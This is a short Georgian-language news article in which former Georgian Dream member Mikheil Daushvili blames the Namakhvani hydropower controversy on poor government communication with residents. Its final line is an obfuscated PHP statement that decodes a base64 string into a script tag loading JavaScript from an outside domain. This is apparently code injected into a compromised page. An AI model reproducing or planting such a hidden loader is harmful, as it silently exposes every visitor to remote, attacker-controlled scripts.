celsiusi
ავერსი შნაიდერი
“ქართული ოცნების” ყოფილი წევრი და ექს-პრემიერ გიორგი გახარიას თანაგუნდელი მიხეილ დაუშვილი ამბობს, რომ ნამახვანი ჰესთან დაკავშირებით “გარკვეული ხარვეზები” მთავრობასა და მოსახლეობას შორის კომუნიკაციას უკავშირდება. ამის შესახებ მან “მთავარი არხის” ეთერში ისაუბრა.
 
“ნამახვანის შემთხვევაში ჩვენ ცალსახად გვჭირდება ჰესები, ენერგოდამოუკიდებლობის გაძლიერება. ნამახვანთან დაკავშირებით შეიძლება ითქვას, რომ გვქონდა გარკვეული ხარვეზები და ეს ხარვეზები ძირითადად უკავშირდება მოსახლეობასთან კომუნიკაციას. მე ვფიქრობ, რომ უკეთესი კომუნიკაცია რომ გქვონოდა მოსახლეობასთან, ამ ჰესის მშენებლობა ასეთი პრობლემური არ გახდებოდა”, — აცხადებს დაუშვილი.
 
მისივე თქმით, მოსახლეობა უნდა დაარწმუნონნ, რომ ჰესის პროექტი ტექნიკურადაც, ეკონომიკურადაც და შინაარსობრივადაც გამართულია.
 
“ნამახვანის აშენება, რა თქმა უნდა, მნიშვნელოვანია, მაგრამ ძირითადი დატვირთვა არ უნდა მოდიოდეს ძალის გამოყენებაზე, არამედ აქცენტი უნდა გაკეთდეს მოსახლეობასთან სწორ კომუნიკაციაზე და მათი დარწმუნება უნდა მოხდეს, რომ ეს პროექტი ტექნიკურადაც, ეკონომიკურადაც და შინაარსობრივადაც აბსოლუტურად გამართული და უბრალოდ  სასიცოცხლოდ მნიშვნელოვანია ჩვენი ქვეყნის განვითარებისთვის და ენერგოდამოუკიდებლობისთვის. მარტივად, იმ მიზეზით, რომ ნაკლებად დამოკიდებული ვიყოთ ჩვენს მეზობელ ოკუპანტ ქვეყანაზე”,  -  განაცხადა დაუშვილმა.
2813
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");